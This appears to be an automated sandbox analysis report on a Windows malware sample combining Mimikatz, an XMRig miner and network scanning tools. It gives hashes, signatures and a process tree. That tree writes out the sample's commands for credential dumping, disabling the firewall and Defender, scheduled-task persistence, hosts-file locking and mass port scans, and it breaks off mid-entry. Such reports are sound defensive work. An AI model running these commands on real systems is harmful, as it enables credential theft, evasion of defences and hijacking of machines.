Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 05:47

General

  • Target

    2024-04-21_7ae549ac64c06bfe3503ade2c9a24b73_hacktools_icedid_mimikatz.exe

  • Size

    8.7MB

  • MD5

    7ae549ac64c06bfe3503ade2c9a24b73

  • SHA1

    11905e72aabf6faa07eeede56b570d42feb397a9

  • SHA256

    d8b846ecf0b55042b3ad8127e2a992f94ea7a79df69d430b627aa6d7c2bb112f

  • SHA512

    74eca3383b22da87f5e42abb1216e85ed617ec5a4b09c1d882670e02c587b78d6f1402566e417b761bf27ab4253e0f1a179adbd51d5ade1b192596cc5438f5ea

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28119) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 40 IoCs
  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2116
      • C:\Windows\TEMP\wvflutbti\gfiitz.exe
        "C:\Windows\TEMP\wvflutbti\gfiitz.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4624
    • C:\Users\Admin\AppData\Local\Temp\2024-04-21_7ae549ac64c06bfe3503ade2c9a24b73_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-21_7ae549ac64c06bfe3503ade2c9a24b73_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\pifhbivn\blifehe.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:552
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2848
        • C:\Windows\pifhbivn\blifehe.exe
          C:\Windows\pifhbivn\blifehe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:848
    • C:\Windows\pifhbivn\blifehe.exe
      C:\Windows\pifhbivn\blifehe.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4620
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3392
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2532
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1596
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:4796
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2164
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:4528
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:4748
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:1888
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:956
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\jnrubemey\mzinlneik\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4032
                          • C:\Windows\jnrubemey\mzinlneik\wpcap.exe
                            C:\Windows\jnrubemey\mzinlneik\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:1036
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2804
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2420
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4668
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:852
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3928
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:5032
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:1988
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:412
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2548
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:1144
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:3352
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:4140
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:4364
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:392
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jnrubemey\mzinlneik\Scant.txt
                                                2⤵
                                                  PID:4252
                                                  • C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe
                                                    C:\Windows\jnrubemey\mzinlneik\llbnzpetn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jnrubemey\mzinlneik\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:4900
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\jnrubemey\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jnrubemey\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:2184
                                                  • C:\Windows\jnrubemey\Corporate\vfshost.exe
                                                    C:\Windows\jnrubemey\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4340
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bifhilltf" /ru system /tr "cmd /c C:\Windows\ime\blifehe.exe"
                                                  2⤵
                                                    PID:2420
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:1988
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "bifhilltf" /ru system /tr "cmd /c C:\Windows\ime\blifehe.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:3920
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bikvmuezk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F"
                                                      2⤵
                                                        PID:4668
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:2792
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "bikvmuezk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:4836
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tjzmgieyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F"
                                                          2⤵
                                                            PID:3396
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:4032
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "tjzmgieyy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\wvflutbti\gfiitz.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:2372
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:1936
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:4504
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:3908
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:4632
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:4724
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:700
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:4948
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:3628
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:2664
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:1988
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:2652
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:2824
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:4748
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:512
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:3516
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:1868
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:3456
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:1128
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3028
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:3376
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:4092
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:3092
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:3932
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:3076
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:2332
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:1052
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:4012
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:2420
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:4104
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1084
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:5076
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3964
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:2472
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2652
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:2692
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1096
                                                                                                                        • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                          C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 764 C:\Windows\TEMP\jnrubemey\764.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3504
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            3⤵
                                                                                                                              PID:3516
                                                                                                                          • C:\Windows\TEMP\xohudmc.exe
                                                                                                                            C:\Windows\TEMP\xohudmc.exe
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:848
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 64 C:\Windows\TEMP\jnrubemey\64.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4032
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2116 C:\Windows\TEMP\jnrubemey\2116.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:452
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2704 C:\Windows\TEMP\jnrubemey\2704.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3932
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2872 C:\Windows\TEMP\jnrubemey\2872.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:348
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3036 C:\Windows\TEMP\jnrubemey\3036.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:624
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3056 C:\Windows\TEMP\jnrubemey\3056.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1856
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3720 C:\Windows\TEMP\jnrubemey\3720.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2760
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3808 C:\Windows\TEMP\jnrubemey\3808.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1600
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3872 C:\Windows\TEMP\jnrubemey\3872.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:688
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 3944 C:\Windows\TEMP\jnrubemey\3944.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3064
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 2956 C:\Windows\TEMP\jnrubemey\2956.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1544
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1656 C:\Windows\TEMP\jnrubemey\1656.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3228
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 1288 C:\Windows\TEMP\jnrubemey\1288.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4200
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 964 C:\Windows\TEMP\jnrubemey\964.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3624
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 4176 C:\Windows\TEMP\jnrubemey\4176.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1796
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 4128 C:\Windows\TEMP\jnrubemey\4128.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:540
                                                                                                                          • C:\Windows\TEMP\jnrubemey\ttliziesz.exe
                                                                                                                            C:\Windows\TEMP\jnrubemey\ttliziesz.exe -accepteula -mp 4948 C:\Windows\TEMP\jnrubemey\4948.dmp
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3740
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c C:\Windows\jnrubemey\mzinlneik\scan.bat
                                                                                                                            2⤵
                                                                                                                              PID:4080
                                                                                                                              • C:\Windows\jnrubemey\mzinlneik\lbwtnreih.exe
                                                                                                                                lbwtnreih.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:4304
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                              2⤵
                                                                                                                                PID:4740
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                  3⤵
                                                                                                                                    PID:4300
                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                    3⤵
                                                                                                                                      PID:2772
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                      3⤵
                                                                                                                                        PID:3352
                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                        3⤵
                                                                                                                                          PID:7116
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                          3⤵
                                                                                                                                            PID:1524
                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                            3⤵
                                                                                                                                              PID:688
                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\blifehe.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:3484
                                                                                                                                            • C:\Windows\ime\blifehe.exe
                                                                                                                                              C:\Windows\ime\blifehe.exe
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:1096
                                                                                                                                          • C:\Windows\SysWOW64\tyttue.exe
                                                                                                                                            C:\Windows\SysWOW64\tyttue.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:3884
                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\blifehe.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:348
                                                                                                                                              • C:\Windows\ime\blifehe.exe
                                                                                                                                                C:\Windows\ime\blifehe.exe
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:4632
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pifhbivn\blifehe.exe /p everyone:F
                                                                                                                                              1⤵
                                                                                                                                                PID:264
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1892
                                                                                                                                                  • C:\Windows\system32\cacls.exe
